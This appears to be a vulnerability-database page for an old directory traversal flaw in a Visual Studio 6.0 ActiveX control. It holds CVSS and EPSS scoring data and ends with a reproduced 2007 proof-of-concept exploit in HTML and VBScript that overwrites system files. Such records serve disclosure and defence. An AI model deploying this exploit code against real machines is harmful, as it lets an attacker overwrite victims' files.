CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Absolute directory traversal vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5.8
AV:N/AC:M/Au:N/C:N/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
24.73%
–
–
2022-04-03
–
–
24.73%
–
–
2023-03-12
–
–
–
2.4%
–
2023-06-04
–
–
–
3.1%
–
2023-09-24
–
–
–
2.23%
–
2024-01-14
–
–
–
2.11%
–
2024-02-11
–
–
–
2.11%
–
2024-02-18
–
–
–
1.32%
–
2024-03-31
–
–
–
2.3%
–
2024-04-14
–
–
–
2.3%
–
2024-06-02
–
–
–
2.3%
–
2024-06-16
–
–
–
2.38%
–
2024-07-21
–
–
–
3.24%
–
2024-08-25
–
–
–
4.51%
–
2024-10-06
–
–
–
5.54%
–
2024-11-10
–
–
–
4.35%
–
2024-12-22
–
–
–
4.35%
–
2025-01-19
–
–
–
4.35%
–
2025-03-18
–
–
–
–
26.51%
2025-03-18
–
–
–
–
26.51,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">---------------------------------------------------------------------------------------------------------
<b>Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite</b>
url: http://www.microsoft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Description:
Using the "Load()" method we can load the content of a file from local machine passed as argument to
this function and then save it into arbitrary location with the "SaveAs()" method.
This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
remote directories (http) but, unfortunately, it accepts only local directories.</b>
---------------------------------------------------------------------------------------------------------
<object classid='clsid:7EEA39E3-41D1-11D2-AB3B-00AA00BDD685' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
test.Load "c:\windows\system32\cmd.exe" 'or just some existing file
test.SaveAs "c:\windows\system_.ini"
MsgBox "Exploit completed!"
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-09-11]